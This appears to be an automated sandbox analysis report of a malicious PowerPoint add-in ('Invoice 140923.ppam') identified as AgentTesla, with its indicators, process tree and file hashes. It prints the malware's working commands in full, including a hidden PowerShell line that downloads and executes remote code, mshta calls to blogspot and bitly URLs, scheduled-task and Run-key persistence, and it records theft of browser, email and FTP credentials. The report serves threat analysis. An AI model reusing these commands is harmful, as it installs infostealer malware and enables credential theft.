Analysis
-
max time kernel
128s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
22-10-2021 04:59
Static task
static1
Behavioral task
behavioral1
Sample
Invoice 140923.ppam
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Invoice 140923.ppam
Resource
win10-en-20210920
General
-
Target
Invoice 140923.ppam
-
Size
8KB
-
MD5
5d1279434725ccad24da08658d073a23
-
SHA1
5bd8e406df2a5547bf74fefde17a6a7e4b51358e
-
SHA256
b56a00462c6fdfd3fc68869ecda35f6832bee4cdcb81e06bf85b3e4c3336fd77
-
SHA512
9977a2a96b7aa32d4268423adef7b5cee2ae36e7aa6c42a886f1003c845cf71cccd14b6d3e264e0b637a9a2f2f19236d885c75cf60b9d3a5f2a8598a6ddc68f6
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2188 3612 mshta.exe POWERPNT.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2036-325-0x000000000043752E-mapping.dmp family_agenttesla behavioral2/memory/3204-392-0x000000000043752E-mapping.dmp family_agenttesla behavioral2/memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmp family_agenttesla -
Blocklisted process makes network request 11 IoCs
Processes:
mshta.exepowershell.exeflow pid process 33 2188 mshta.exe 36 2188 mshta.exe 41 2188 mshta.exe 43 2188 mshta.exe 47 2188 mshta.exe 50 2188 mshta.exe 51 2188 mshta.exe 53 2188 mshta.exe 54 2188 mshta.exe 56 2188 mshta.exe 58 2300 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/15.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/15.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/15.html\"" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 2300 set thread context of 2036 2300 powershell.exe jsc.exe PID 2300 set thread context of 3204 2300 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4636 taskkill.exe 4788 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3612 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 3440 dw20.exe 3440 dw20.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 2036 jsc.exe 2036 jsc.exe 3204 RegAsm.exe 3204 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 3204 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 4788 taskkill.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2036 jsc.exe Token: SeDebugPrivilege 3204 RegAsm.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 3612 POWERPNT.EXE 3612 POWERPNT.EXE 3612 POWERPNT.EXE 2036 jsc.exe 3204 RegAsm.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 3612 wrote to memory of 2188 3612 POWERPNT.EXE mshta.exe PID 3612 wrote to memory of 2188 3612 POWERPNT.EXE mshta.exe PID 2188 wrote to memory of 4636 2188 mshta.exe taskkill.exe PID 2188 wrote to memory of 4636 2188 mshta.exe taskkill.exe PID 2188 wrote to memory of 4788 2188 mshta.exe taskkill.exe PID 2188 wrote to memory of 4788 2188 mshta.exe taskkill.exe PID 2188 wrote to memory of 1460 2188 mshta.exe schtasks.exe PID 2188 wrote to memory of 1460 2188 mshta.exe schtasks.exe PID 2188 wrote to memory of 2300 2188 mshta.exe powershell.exe PID 2188 wrote to memory of 2300 2188 mshta.exe powershell.exe PID 2188 wrote to memory of 3440 2188 mshta.exe dw20.exe PID 2188 wrote to memory of 3440 2188 mshta.exe dw20.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 2036 2300 powershell.exe jsc.exe PID 2300 wrote to memory of 4068 2300 powershell.exe csc.exe PID 2300 wrote to memory of 4068 2300 powershell.exe csc.exe PID 4068 wrote to memory of 2172 4068 csc.exe cvtres.exe PID 4068 wrote to memory of 2172 4068 csc.exe cvtres.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe PID 2300 wrote to memory of 3204 2300 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice 140923.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdlwdprufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B13.tmp" "c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/15.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29123⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.dllMD5
c387386dec8391ecf3027d668c487923
SHA1984444fbd377dbcffe8ba2761de24ddd0cc6fac4
SHA2561ae5d2f24f53d966cee4e62ab3a2fe92bee19ba85cab4165b3200af2fc9c39de
SHA512bad92c568cb6b92719483290b459e24ffb5d44dae881e85064e62da6a857bd355ad0413cc2957f3d6a4b2eee1f62e4f43b89dcf17879a63af92a1f5df6cc483b
-
C:\Users\Admin\AppData\Local\Temp\RES2B13.tmpMD5
c1ca2418445211426574599aa341f3e3
SHA1af5db3ed03a9aa37bd5ad8dd2dd7e75eb3c94a40
SHA25617a5e183c9e68e2f781cba0f56c5481914fb69e55abebb108baf3499150675aa
SHA512d791a5199a016267bee9c41e48416e28a3f8fac2a866ec430f7b11c54b0c50fef5e3e85f7428947573721358fd6ac2005202eb22c33f941d4205868e0a0fd322
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdlineMD5
a83664a824d1bbad36c9b129c994107a
SHA1ef12ce920e87c2ecb624cdcb024e045de8c575f8
SHA2562011b1d55fb39b05b420ea8c13787a5a9ee3ac79ec918c336cc26f669e1506ac
SHA5127b4a316f815ced28db84c494ebf939d9b824bb5cbc224e3ff5a0b91ae4173a67d846e4312d07fee9872d1beaa4f3fa08f7d495d212c8987f3348f70715427b0f
-
\??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMPMD5
aa68a47ab2b40d3fb10ed97e9c72015c
SHA199037f728e0a4c560c04444475b70e593fb545a4
SHA2566787a5493494d3f5d0ade491e5bef8873a343843318d85cf5b42acc567d95213
SHA512ea5f713046ee276896504d295de71bbb5c74e40f3e8acc8a4da8f123e93003eb7ad96003138ea5bc103a85f712673d8f0981e65a8a7a0113650374970240b4ca
-
memory/1460-301-0x0000000000000000-mapping.dmp
-
memory/2036-407-0x0000000005640000-0x0000000005B3E000-memory.dmpFilesize
5.0MB
-
memory/2036-325-0x000000000043752E-mapping.dmp
-
memory/2036-334-0x0000000005640000-0x0000000005B3E000-memory.dmpFilesize
5.0MB
-
memory/2172-386-0x0000000000000000-mapping.dmp
-
memory/2188-263-0x0000000000000000-mapping.dmp
-
memory/2300-302-0x0000000000000000-mapping.dmp
-
memory/2300-318-0x0000016879E86000-0x0000016879E88000-memory.dmpFilesize
8KB
-
memory/2300-316-0x0000016879E80000-0x0000016879E82000-memory.dmpFilesize
8KB
-
memory/2300-317-0x0000016879E83000-0x0000016879E85000-memory.dmpFilesize
8KB
-
memory/3204-409-0x0000000004CD0000-0x00000000051CE000-memory.dmpFilesize
5.0MB
-
memory/3204-392-0x000000000043752E-mapping.dmp
-
memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmpFilesize
5.0MB
-
memory/3440-303-0x0000000000000000-mapping.dmp
-
memory/3612-120-0x0000024175E50000-0x0000024175E52000-memory.dmpFilesize
8KB
-
memory/3612-128-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmpFilesize
64KB
-
memory/3612-116-0x00007FFB51920000-0x00007FFB51930000-memory.dmpFilesize
64KB
-
memory/3612-117-0x00007FFB51920000-0x00007FFB51930000-memory.dmpFilesize
64KB
-
memory/3612-248-0x00000241074D0000-0x00000241074D4000-memory.dmpFilesize
16KB
-
memory/3612-129-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmpFilesize
64KB
-
memory/3612-118-0x00007FFB51920000-0x00007FFB51930000-memory.dmpFilesize
64KB
-
memory/3612-122-0x0000024175E50000-0x0000024175E52000-memory.dmpFilesize
8KB
-
memory/3612-119-0x0000024175E50000-0x0000024175E52000-memory.dmpFilesize
8KB
-
memory/3612-115-0x00007FFB51920000-0x00007FFB51930000-memory.dmpFilesize
64KB
-
memory/3612-121-0x00007FFB51920000-0x00007FFB51930000-memory.dmpFilesize
64KB
-
memory/4068-383-0x0000000000000000-mapping.dmp
-
memory/4636-299-0x0000000000000000-mapping.dmp
-
memory/4788-300-0x0000000000000000-mapping.dmp